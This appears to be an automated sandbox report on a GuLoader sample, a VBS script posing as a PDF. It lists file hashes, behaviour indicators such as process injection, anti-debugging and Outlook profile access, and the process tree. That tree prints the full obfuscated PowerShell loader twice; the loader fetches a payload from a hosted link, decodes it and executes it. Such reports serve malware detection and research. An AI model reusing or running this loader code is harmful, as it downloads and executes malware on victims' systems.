Analysis
max time kernel: 92s
max time network: 96s
platform: windows10-2004_x64
resource: win10v2004-20231023-en
resource tags: arch:x64 arch:x86 image:win10v2004-20231023-en locale:en-us os:windows10-2004-x64 system
submitted: 13-11-2023 06:50
Static task: static1
Behavioral task: behavioral1
  Sample: SOCSO_20230005324867·pdf.vbs
  Resource: win7-20231020-en
Behavioral task: behavioral2
  Sample: SOCSO_20230005324867·pdf.vbs
  Resource: win10v2004-20231023-en
General
Target: SOCSO_20230005324867·pdf.vbs
Size: 255KB
MD5: f1e7be6402e721940bddf3f1d917aaf5
SHA1: 6c04996641de91fc7adcf12d0791e2e9e174c856
SHA256: 4d102deeb0b15997e2197b8e69db45f5fe951c2b5091a5ccac7a8e26ea261652
SHA512: 3355c3501c262cb4cb47880abdbfdc82e7220bf02d982272bf54902526af2cf8e34faf546d4d13849822ae9c1325057eecc6088a45ee434b7c9e53d87e22347d
SSDEEP: 6144:jb1IJnEsovnKtPiPPL8+MOyqBT0LgPnOtwybUnmQ:f1/nKKPLJMdfwyTQ
Malware Config
Signatures
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.

Blocklisted process makes network request (1 IoCs)
  flow | pid | Process
  4 | 5032 | WScript.exe

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | WScript.exe

Accesses Microsoft Outlook profiles (1 TTPs, 3 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | wab.exe
  Key opened | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | wab.exe
  Key opened | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | wab.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  pid | Process
  4196 | wab.exe
  4196 | wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid | Process
  836 | powershell.exe
  4196 | wab.exe

Suspicious use of SetThreadContext (1 IoCs)
  description | pid | Process | procid_target
  PID 836 set thread context of 4196 | 836 | powershell.exe | 113

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid | Process
  1232 | powershell.exe
  1232 | powershell.exe
  836 | powershell.exe
  836 | powershell.exe

Suspicious behavior: MapViewOfSection (1 IoCs)
  pid | Process
  836 | powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 1232 | powershell.exe
  Token: SeDebugPrivilege | 836 | powershell.exe
  Token: SeDebugPrivilege | 4196 | wab.exe

Suspicious use of WriteProcessMemory (10 IoCs)
  description | pid | Process | procid_target
  PID 5032 wrote to memory of 1232 | 5032 | WScript.exe | 101
  PID 5032 wrote to memory of 1232 | 5032 | WScript.exe | 101
  PID 1232 wrote to memory of 836 | 1232 | powershell.exe | 103
  PID 1232 wrote to memory of 836 | 1232 | powershell.exe | 103
  PID 1232 wrote to memory of 836 | 1232 | powershell.exe | 103
  PID 836 wrote to memory of 4196 | 836 | powershell.exe | 113
  PID 836 wrote to memory of 4196 | 836 | powershell.exe | 113
  PID 836 wrote to memory of 4196 | 836 | powershell.exe | 113
  PID 836 wrote to memory of 4196 | 836 | powershell.exe | 113
  PID 836 wrote to memory of 4196 | 836 | powershell.exe | 113

outlook_office_path (1 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | wab.exe

outlook_win_path (1 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | wab.exe
Processes
C:\Windows\System32\WScript.exe (process tree level 1)
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOCSO_20230005324867·pdf.vbs"
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5032
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "function Trskninge ([String]$Ornecentr){$Puff = 8;$Suldanf154 = ($Ornecentr | Measure-Object -Character).Characters;For ($Iwwoodinte=7; $Iwwoodinte -lt $Suldanf154-1; $Iwwoodinte+=$Puff){$Unvolu=$Unvolu+$Ornecentr.Substring($Iwwoodinte, 1)};$Unvolu;}$Gettysbu=Trskninge 'HarvernhModetsstlngdematclistotp Germuns Ganjas:Griffon/Nellies/ ClickydRestgldrBruisafi PuckfivBraendpeRechall.Chiningg Tapperouniverso Mestreg elskerlNervebueInsocia.DenticucFlerfamoballonpm Tilvir/TenrecsuoutsliccGumbero?ansamleeAbbrevixBrugsgepPrivatpoValetudrLivreddtHatchet= BecifrdIscenesobarrancwAddressnForksmilAccomplo TweakeaUnfantad Flkkse&ForentaiRandbetdOctinge=Opsigel1Torpedoa OrthosBUndividKStokesiGSkumlerKQuadripFAmalgamqHeadrooQFoldedr- Relati6RobinfoBHypotesaNonbiturCimbria3MummifiQYachtisRGelatedZFredlysVkurinitbtilkomsa Interf4SulfuryE ShampoWDhanuramDevalueaOrkerenSCouteauzBuslommgVealski5 IndopeQDepraveuDiffusi2 Stereo ';$Unvolu01=Trskninge ' KunkuriParadigeUpperstxLaddiki ';$Bakskul= $Unvolu01;$Dativer = Trskninge 'Optankn\AnnonacsAssadstyporsenesHalshviw CrummooFilistrwhygrome6Fustleo4 Chessd\ KlarlgWKerneneiRearguenMadonnadapothegoPhotophwAdresses SlendrP ValfaroVedblevwInteresePlanishrImpressSUnreprehUskrmtee FormallAprosoplIndsukr\EkvilibvSierral1Handrea.resulta0 Mythol\ Fasanhp Bogtryo UmbracwAdoptioe vrnerirFructifsMuskineh ParadieUncomprlStorfyrlStribni. 
KonkureLuckingxHubertoeForskni ';& ($Unvolu01) (Trskninge 'Profete$AerodroBTydeligasandelngFiskestgSynssanaFrstebeaDegummir entomodModemli2Genfrem=Feyerce$GuldbryeWaistconrettefavSpidsni:HndendewCosmozoi interanConsolad plataniXylofonrAarsber ') ;& ($Unvolu01) (Trskninge 'Pulveri$ UdvelsDBulgesyaBestigetIndoorpiPsychosvIllusioeegeranhrPacksad=Hustank$BagerbuBundergeaGestantg Unpremgeurochea ForlenaNorthearBannerfdSstykke2skgenda+Sortest$SkumlerDNemascoaNdringstArgumeniCistercvDocentue preussr linieu ') ;& ($Unvolu01) (Trskninge 'Rfathea$TrimestB paratyaDemobilncongasfk optaarjBienniooBregnerb hemoclmWashhaneProphes Sofasen= Bideta Farvelg( Decibe(Intentig MateriwFunctiomJarnissitrakkas UdskifwsommertiEtymolonMarcipa3Gelledd2Tubfull_Upcheerp Eskimor SekteroCoercercInapproe SkoleesmicrotusSurmlks Headhun-UnsegreFPolycar AgrarePbdeansvruncapteoMatriarcChrismaeMontesssPyeloursTyndsleIInfektidCentesi=Bertopa$Frivole{ StraleP OmtrenIvietconDtopcast}Exartic)Bhiltil.NonsyndCBaksgasoRegularmConferemAgglomeaComminantolerandBadevanL TurnipiHarzburn Kartotehalslge)aktbefr Connect-Udtmnins LobbympCongeall PlateaiClartietHelioel Transpe[BarneaacSlutskehPredisraPicturerSpeerin]Overbri3 hellig4 Phasit ');. 
($Unvolu01) (Trskninge ' Skaani$PolyadeM Deledmn OutsidiKulturcuActinosmMachini Opgavef=Formaal Firebr$SocioloBFortrinaRumstjbnFlammeskClarinejTussahcoSelskabbComperemYeggmeneSkinbar[ Dokume$OrdforkB FiloseaKysseren OadhyekBaksninjGoosefooAnonymibHeksagrmPopulareBengter.RetrievcImposito BourlauCulmingn Genindt Ressou-aerohyd2Vandlbs]Sportsf ');& ($Unvolu01) (Trskninge 'Subjekt$ AandeaSskabilkyDialyzanautodidoHobbyrud TageteaBrainpalImprovel AbonneyTelfonm=Spillek( UnsedaT SkndegeTransfes PhonomtCarbond-PaatagePArbejdsaVedetsttTavlernhUdskuds forskn$BenfrieDhederalaGuiltshtTerroriiSurpeopvUdtageleEwasblerSubelap)Overvej Helicop-RevivifAHeterotnHoudinidArdentl Homogen(Nevilss[HundekiICelleden AmphimtmultiguPRettight UbrugtrNonboas]Kilovar:Milieuf:SprngfasSplidagiAlbumenzvandbreeUrtiden Rekviem-IntereseLspestaqHleripr Kattyss8Fletkod)Tachyph ') ;if ($Synodally) {. $Dativer $Mnium;} else {;$Unvolu00=Trskninge 'FrihedsSBirkentt subacraRdderlirSadielitFritids-UncloakB EvasioiChassist Lapidas LandssTSkottehrUnburroaWamozarn GorvarsrivegilfCirrusseStubkjarBackbre Premie-AntoniaSMellituoCampereu Osmomer OverwocTvangsfeLundhol Kongres$BlaajenGUdsgendeKontroltAgnessttKobenreyArmkrftsLavestbb Skriveumillime Additio-EspecomD FrivoleFormandsMusiciat DissekiSvovlkinUnderbea HumorotKapitali SlalomoDeklaman Overde Cylinde$UnmutuaB bestveaindolergfructuogStaalsta resoluaSubuneqr Klamred Lervar2 Perspe ';& ($Unvolu01) (Trskninge 'Myrtusd$ FritidBSlbcurraFortidsg MaggiegNonubiqa Overbaa NycterrHalutzbdBolsjes2Krybekl=slutkod$ Sociale KartotnSkmtsarvorangef:LadyismaUnshrilpMammitipStatsfodSuperswaBlindsmtOverstraCrazesb ') ;& ($Unvolu01) (Trskninge ' convenISacrocom HaematpRoklubbo UnomenrBillardtVigesim-FrihavnMFustieso Carlesd Kanareu PreovelHenstteeBlueste TrommeBTranesiiSkovfyrt ZealotsOutreneTHyperberWilmaraa OptimenPitmanmsmegalokfvandalieCocketrrGibbern ') ;$Baggaard2=$Baggaard2+'\Hundjvlen.Pre';while (-not $Fraktio209) {& ($Unvolu01) (Trskninge 'Uglered$ SpeedbFPsychodrTerebraa 
DuelbekVachetttidiotroiMollycooGulespu2Repouss0Elidere9Trovaer= Despis(DelegatTHoodsroeTafletbsSwamiestPollaki-DerangePTiedogtaPolermitLuftninhUnsombe Nudiped$ BesmelBPecoptea sengebgHusdyregFyrstesaStueurea DomicirMastectdEsbjerg2Brdfrug) Statoi ') ;& ($Unvolu01) $Unvolu00;& ($Unvolu01) (Trskninge 'SueoxybS BannertOverreaaWenzelsr KoftamtViolenc-AfklendSCorrigelHistorieRefertieGarantepsigilla Nonperf5Borttag ');}& ($Unvolu01) (Trskninge 'Ligebeh$PicketeCSpermath GynantiFilmkunvFaareklaMartyrdrTweezer Pterian=Vvsforl RumfartGForbudseAfklapst Medhjl-MagindaC ForskaoLethalinCommisstUnobtaie Pistoln TaxabltArachni Anteria$BirdyhaB EndotoaRictuscgVibescigFocalisaWelledtaForelqurTequiladOxyacet2Fishies ');& ($Unvolu01) (Trskninge 'Sischap$TrskereASmerglen RediffnSuperoraContrac Papirma=Jordbrm Halidso[AfpresnSspaantayDendrolsMallecht TraveseIsuroidmfourthl.AnyagriCnoncoploTurbolanImprovivstyrereeSttevogrGeneraltBestall]Sprgebi:Sslange:RhapsodFOvergenrLiveneroKlippehmRetsmedBunforceaPhragmostillgsfeovercon6 Databe4SamanidSVanesretMusikinrHuskattiColdbetnBanemrkgEpipodi(Clenchv$LodhiveC BurrfihLuksusaiBawdierv ArchonaBenvnsnrsamfund)Beignet ');& ($Unvolu01) (Trskninge 'Expatri$BilliggU JetmotnanalogivSjusseroBullcallbrinkesuYestere2Bysteaf Idrtsfo=Deutero Adiapho[BredygtSTeletexyMekanissSacchartCampisteHellerimkontrol.LovliggT ArvingeAdamsenxDaemonet Luftru.PansskuEPersillnMadmodecEubacteoBrndvrdd DownfaiTarokkonSkribengAgleafu]Trvesmu:Usolida:dadaistAVerdensSStandsfCHoneypoIPoserseI Michae.KlagejeGLaboureeCurfewetalkalisSTudskratUndelayrZaxtedei Behandn PjuskegPlastic( reddbo$stymperAPtocholnPuntillnsubternaOversig) Bovrup ');& ($Unvolu01) (Trskninge 'Imitati$UdfritkCValsacea AlarmsePseudomsDygtigeaSjalskr=Ordinan$FaselaaUStiklagnGlaikskvVitaminoForfremlIstindiuStrandk2Maxcolo.reicharsCarpmanuHemapodb KlumpesBredbaat MatcharAlleviaiOverdilnEnterotgPearles( Incogn Frednin Buksels2underbe5 Myopro7printks9smkssci9Sensati4skrumpe,Aandsfo1Choleri9Noninha6Pinched6Forsgsm9 
Tuneup)Carmele ');. ($Unvolu01) $Caesa;}" (process tree level 2)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1232
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "function Trskninge ([String]$Ornecentr){$Puff = 8;$Suldanf154 = ($Ornecentr | Measure-Object -Character).Characters;For ($Iwwoodinte=7; $Iwwoodinte -lt $Suldanf154-1; $Iwwoodinte+=$Puff){$Unvolu=$Unvolu+$Ornecentr.Substring($Iwwoodinte, 1)};$Unvolu;}$Gettysbu=Trskninge 'HarvernhModetsstlngdematclistotp Germuns Ganjas:Griffon/Nellies/ ClickydRestgldrBruisafi PuckfivBraendpeRechall.Chiningg Tapperouniverso Mestreg elskerlNervebueInsocia.DenticucFlerfamoballonpm Tilvir/TenrecsuoutsliccGumbero?ansamleeAbbrevixBrugsgepPrivatpoValetudrLivreddtHatchet= BecifrdIscenesobarrancwAddressnForksmilAccomplo TweakeaUnfantad Flkkse&ForentaiRandbetdOctinge=Opsigel1Torpedoa OrthosBUndividKStokesiGSkumlerKQuadripFAmalgamqHeadrooQFoldedr- Relati6RobinfoBHypotesaNonbiturCimbria3MummifiQYachtisRGelatedZFredlysVkurinitbtilkomsa Interf4SulfuryE ShampoWDhanuramDevalueaOrkerenSCouteauzBuslommgVealski5 IndopeQDepraveuDiffusi2 Stereo ';$Unvolu01=Trskninge ' KunkuriParadigeUpperstxLaddiki ';$Bakskul= $Unvolu01;$Dativer = Trskninge 'Optankn\AnnonacsAssadstyporsenesHalshviw CrummooFilistrwhygrome6Fustleo4 Chessd\ KlarlgWKerneneiRearguenMadonnadapothegoPhotophwAdresses SlendrP ValfaroVedblevwInteresePlanishrImpressSUnreprehUskrmtee FormallAprosoplIndsukr\EkvilibvSierral1Handrea.resulta0 Mythol\ Fasanhp Bogtryo UmbracwAdoptioe vrnerirFructifsMuskineh ParadieUncomprlStorfyrlStribni. 
KonkureLuckingxHubertoeForskni ';& ($Unvolu01) (Trskninge 'Profete$AerodroBTydeligasandelngFiskestgSynssanaFrstebeaDegummir entomodModemli2Genfrem=Feyerce$GuldbryeWaistconrettefavSpidsni:HndendewCosmozoi interanConsolad plataniXylofonrAarsber ') ;& ($Unvolu01) (Trskninge 'Pulveri$ UdvelsDBulgesyaBestigetIndoorpiPsychosvIllusioeegeranhrPacksad=Hustank$BagerbuBundergeaGestantg Unpremgeurochea ForlenaNorthearBannerfdSstykke2skgenda+Sortest$SkumlerDNemascoaNdringstArgumeniCistercvDocentue preussr linieu ') ;& ($Unvolu01) (Trskninge 'Rfathea$TrimestB paratyaDemobilncongasfk optaarjBienniooBregnerb hemoclmWashhaneProphes Sofasen= Bideta Farvelg( Decibe(Intentig MateriwFunctiomJarnissitrakkas UdskifwsommertiEtymolonMarcipa3Gelledd2Tubfull_Upcheerp Eskimor SekteroCoercercInapproe SkoleesmicrotusSurmlks Headhun-UnsegreFPolycar AgrarePbdeansvruncapteoMatriarcChrismaeMontesssPyeloursTyndsleIInfektidCentesi=Bertopa$Frivole{ StraleP OmtrenIvietconDtopcast}Exartic)Bhiltil.NonsyndCBaksgasoRegularmConferemAgglomeaComminantolerandBadevanL TurnipiHarzburn Kartotehalslge)aktbefr Connect-Udtmnins LobbympCongeall PlateaiClartietHelioel Transpe[BarneaacSlutskehPredisraPicturerSpeerin]Overbri3 hellig4 Phasit ');. 
($Unvolu01) (Trskninge ' Skaani$PolyadeM Deledmn OutsidiKulturcuActinosmMachini Opgavef=Formaal Firebr$SocioloBFortrinaRumstjbnFlammeskClarinejTussahcoSelskabbComperemYeggmeneSkinbar[ Dokume$OrdforkB FiloseaKysseren OadhyekBaksninjGoosefooAnonymibHeksagrmPopulareBengter.RetrievcImposito BourlauCulmingn Genindt Ressou-aerohyd2Vandlbs]Sportsf ');& ($Unvolu01) (Trskninge 'Subjekt$ AandeaSskabilkyDialyzanautodidoHobbyrud TageteaBrainpalImprovel AbonneyTelfonm=Spillek( UnsedaT SkndegeTransfes PhonomtCarbond-PaatagePArbejdsaVedetsttTavlernhUdskuds forskn$BenfrieDhederalaGuiltshtTerroriiSurpeopvUdtageleEwasblerSubelap)Overvej Helicop-RevivifAHeterotnHoudinidArdentl Homogen(Nevilss[HundekiICelleden AmphimtmultiguPRettight UbrugtrNonboas]Kilovar:Milieuf:SprngfasSplidagiAlbumenzvandbreeUrtiden Rekviem-IntereseLspestaqHleripr Kattyss8Fletkod)Tachyph ') ;if ($Synodally) {. $Dativer $Mnium;} else {;$Unvolu00=Trskninge 'FrihedsSBirkentt subacraRdderlirSadielitFritids-UncloakB EvasioiChassist Lapidas LandssTSkottehrUnburroaWamozarn GorvarsrivegilfCirrusseStubkjarBackbre Premie-AntoniaSMellituoCampereu Osmomer OverwocTvangsfeLundhol Kongres$BlaajenGUdsgendeKontroltAgnessttKobenreyArmkrftsLavestbb Skriveumillime Additio-EspecomD FrivoleFormandsMusiciat DissekiSvovlkinUnderbea HumorotKapitali SlalomoDeklaman Overde Cylinde$UnmutuaB bestveaindolergfructuogStaalsta resoluaSubuneqr Klamred Lervar2 Perspe ';& ($Unvolu01) (Trskninge 'Myrtusd$ FritidBSlbcurraFortidsg MaggiegNonubiqa Overbaa NycterrHalutzbdBolsjes2Krybekl=slutkod$ Sociale KartotnSkmtsarvorangef:LadyismaUnshrilpMammitipStatsfodSuperswaBlindsmtOverstraCrazesb ') ;& ($Unvolu01) (Trskninge ' convenISacrocom HaematpRoklubbo UnomenrBillardtVigesim-FrihavnMFustieso Carlesd Kanareu PreovelHenstteeBlueste TrommeBTranesiiSkovfyrt ZealotsOutreneTHyperberWilmaraa OptimenPitmanmsmegalokfvandalieCocketrrGibbern ') ;$Baggaard2=$Baggaard2+'\Hundjvlen.Pre';while (-not $Fraktio209) {& ($Unvolu01) (Trskninge 'Uglered$ SpeedbFPsychodrTerebraa 
DuelbekVachetttidiotroiMollycooGulespu2Repouss0Elidere9Trovaer= Despis(DelegatTHoodsroeTafletbsSwamiestPollaki-DerangePTiedogtaPolermitLuftninhUnsombe Nudiped$ BesmelBPecoptea sengebgHusdyregFyrstesaStueurea DomicirMastectdEsbjerg2Brdfrug) Statoi ') ;& ($Unvolu01) $Unvolu00;& ($Unvolu01) (Trskninge 'SueoxybS BannertOverreaaWenzelsr KoftamtViolenc-AfklendSCorrigelHistorieRefertieGarantepsigilla Nonperf5Borttag ');}& ($Unvolu01) (Trskninge 'Ligebeh$PicketeCSpermath GynantiFilmkunvFaareklaMartyrdrTweezer Pterian=Vvsforl RumfartGForbudseAfklapst Medhjl-MagindaC ForskaoLethalinCommisstUnobtaie Pistoln TaxabltArachni Anteria$BirdyhaB EndotoaRictuscgVibescigFocalisaWelledtaForelqurTequiladOxyacet2Fishies ');& ($Unvolu01) (Trskninge 'Sischap$TrskereASmerglen RediffnSuperoraContrac Papirma=Jordbrm Halidso[AfpresnSspaantayDendrolsMallecht TraveseIsuroidmfourthl.AnyagriCnoncoploTurbolanImprovivstyrereeSttevogrGeneraltBestall]Sprgebi:Sslange:RhapsodFOvergenrLiveneroKlippehmRetsmedBunforceaPhragmostillgsfeovercon6 Databe4SamanidSVanesretMusikinrHuskattiColdbetnBanemrkgEpipodi(Clenchv$LodhiveC BurrfihLuksusaiBawdierv ArchonaBenvnsnrsamfund)Beignet ');& ($Unvolu01) (Trskninge 'Expatri$BilliggU JetmotnanalogivSjusseroBullcallbrinkesuYestere2Bysteaf Idrtsfo=Deutero Adiapho[BredygtSTeletexyMekanissSacchartCampisteHellerimkontrol.LovliggT ArvingeAdamsenxDaemonet Luftru.PansskuEPersillnMadmodecEubacteoBrndvrdd DownfaiTarokkonSkribengAgleafu]Trvesmu:Usolida:dadaistAVerdensSStandsfCHoneypoIPoserseI Michae.KlagejeGLaboureeCurfewetalkalisSTudskratUndelayrZaxtedei Behandn PjuskegPlastic( reddbo$stymperAPtocholnPuntillnsubternaOversig) Bovrup ');& ($Unvolu01) (Trskninge 'Imitati$UdfritkCValsacea AlarmsePseudomsDygtigeaSjalskr=Ordinan$FaselaaUStiklagnGlaikskvVitaminoForfremlIstindiuStrandk2Maxcolo.reicharsCarpmanuHemapodb KlumpesBredbaat MatcharAlleviaiOverdilnEnterotgPearles( Incogn Frednin Buksels2underbe5 Myopro7printks9smkssci9Sensati4skrumpe,Aandsfo1Choleri9Noninha6Pinched6Forsgsm9 
Tuneup)Carmele ');. ($Unvolu01) $Caesa;}" (process tree level 3)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:836
C:\Program Files (x86)\windows mail\wab.exe (process tree level 4)
Command line: "C:\Program Files (x86)\windows mail\wab.exe"
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4196
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82